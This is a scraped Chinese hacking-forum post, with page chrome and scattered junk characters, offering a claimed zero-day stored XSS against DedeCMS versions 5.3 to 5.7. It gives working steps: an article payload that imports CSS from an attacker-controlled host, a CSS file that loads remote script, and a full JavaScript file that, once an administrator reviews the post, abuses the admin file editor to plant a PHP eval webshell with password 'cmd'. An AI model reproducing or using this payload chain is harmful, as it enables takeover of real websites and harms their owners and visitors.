找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2268|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell  D5 l( r3 m& x; t0 J
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
( n; _9 {5 B- o) T% p9 Z, r目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。. W, D4 S. \% A  s
下面说说利用方法。
% @+ E  D" ?& m1 p条件有2个:
/ b# ?: ~0 H2 O5 Y7 [1.开启注册0 V; v3 R  i0 z5 ]* d/ u& n
2.开启投稿/ H& a5 P# s8 ?
注册会员----发表文章
6 L2 J+ d2 P. u) ^3 X内容填写:
- Y# B7 \# [/ L; e+ r  z复制代码8 {/ ?, j+ P4 k, h6 U' r3 ?7 p3 h7 T
<style>@im\port'\http://xxx.com/xss.css';</style>
2 `( N# p8 d5 L0 W/ I  t* b6 H# R新建XSS.Css3 U+ F! g1 O7 j; z8 V
复制代码* i, s: y- v" T1 d( b- W
.body{9 O. D! }& v( Q5 z: L8 {& t
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
! o& w' J/ w; W- E' y1 e新建xss.js 内容为( `  l4 ]4 g- r
复制代码$ y: v. X( r, t6 Y' R, @
1.var request = false;
. f2 M8 r- T/ c2.if(window.XMLHttpRequest) {0 l8 M) ]% P7 u$ d$ c& B+ S1 w
3.request = new XMLHttpRequest();
$ I" W1 }' }; Q1 C$ K4.if(request.overrideMimeType) {
* w9 s4 B) I: a. d* o5.request.overrideMimeType('text/xml');6 \; y6 @( X6 ~6 \
6.}
( |9 y8 I7 A1 Q& O) D5 b2 c7.} else if(window.ActiveXObject) {, M9 u* G+ B: M' ?& \6 c2 @
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];$ C, J' R2 b6 q9 g6 d  p0 \
9.for(var i=0; i<versions.length; i++) {/ t' R5 q# j3 C! Y
10.try {
  e! h0 |+ g2 w( g# W11.request = new ActiveXObject(versions);
; }, I, I7 P& _5 X. e1 q12.} catch(e) {}
7 b$ ]3 @- P/ U& J& v1 e13.}; {" S, D  i, g4 q
14.}
9 |5 L7 v1 L5 G! j+ j$ \3 t15.xmlhttp=request;
' Y* h# \4 E+ w16.function getFolder( url ){
- o) ^2 K& k5 F1 ^" S$ C1 n17. obj = url.split('/')
2 Z0 e$ [1 a4 ~! w' d3 s18. return obj[obj.length-2]
- n5 w- G7 \/ s6 P0 F! Y9 U" E19.}1 z) Z( L2 q+ W1 Y; K% V- K, C  d+ R
20.oUrl = top.location.href;2 _# c7 m: O7 p' n8 M! y/ f; V. u+ R
21.u = getFolder(oUrl);! \  r1 m+ z. X, j4 L
22.add_admin();
8 g9 F. T) Y1 w+ q23.function add_admin(){
) m, T$ {3 a& t! _# u, K2 @24.var url= "/"+u+"/sys_sql_query.php";
4 l* {( _: E' s' r25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";; s$ Q  z4 H5 K8 Y3 O
26.xmlhttp.open("POST", url, true);
; N9 E- F4 x; S27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
6 W1 ?  T6 f, N% ]; y0 ?28.xmlhttp.setRequestHeader("Content-length", params.length);
) q6 P0 X* R2 m% C( n4 _+ _29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
8 h" N! G- u% Y( B0 ~) ^30.xmlhttp.send(params);6 }* d8 z8 M4 c
31.}# @7 ^8 y" V  d/ Q  H
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表